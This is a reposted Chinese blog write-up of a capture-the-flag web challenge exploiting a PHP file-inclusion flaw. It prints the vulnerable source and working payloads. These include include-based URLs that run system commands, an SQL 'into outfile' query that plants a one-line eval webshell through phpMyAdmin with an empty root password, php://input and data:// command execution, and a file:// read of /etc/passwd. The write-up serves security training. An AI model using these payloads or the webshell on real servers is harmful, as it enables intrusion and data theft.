当前位置:网站首页>攻防世界(web篇)---Web_php_include

攻防世界(web篇)---Web_php_include

2022-06-09 15:52:00 肖萧然

攻防世界(web篇)—Web_php_include

题目

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    
    $page=str_replace("php://", "", $page);
}
include($page);
?>

hello传值

http://111.200.241.244:57895/?page=http://127.0.0.1/?hello=<?php%system("ls");?>

http://111.200.241.244:57895/?page=http://127.0.0.1/?hello=<?php%show_source("fl4gisisish3r3.php");?>

phpmyadmin写马

路径扫描能找到phpmyadmin

在这里插入图片描述

账号root 密码为空

phpmyadmin变量secure_file_priv值为空,说明可以写入一句话木马

show variables like "secure_file_priv";

在这里插入图片描述

传成功

select "<?php eval($_POST[1]); ?>"into outfile '/tmp/1.php'

在这里插入图片描述

测试

在这里插入图片描述

大写绕过 PHP://input

php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行

利用该方法,我们可以直接写入php文件,输入file=php://input,然后使用burp抓包,写入php代码:

在这里插入图片描述

data://

http://111.200.241.244:59458/?page=data://text/plain,<?php system("ls")?>
http://111.200.241.244:59458/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=

file://协议

用于访问本地文件系统,不受allow_url_fopen与allow_url_include的影响

即file:// [文件的绝对路径和文件名]

http://111.200.241.244:59458/?page=file:///etc/passwd

原网站

版权声明
本文为[肖萧然]所创,转载请带上原文链接,感谢
https://blog.csdn.net/qq_52549196/article/details/125159424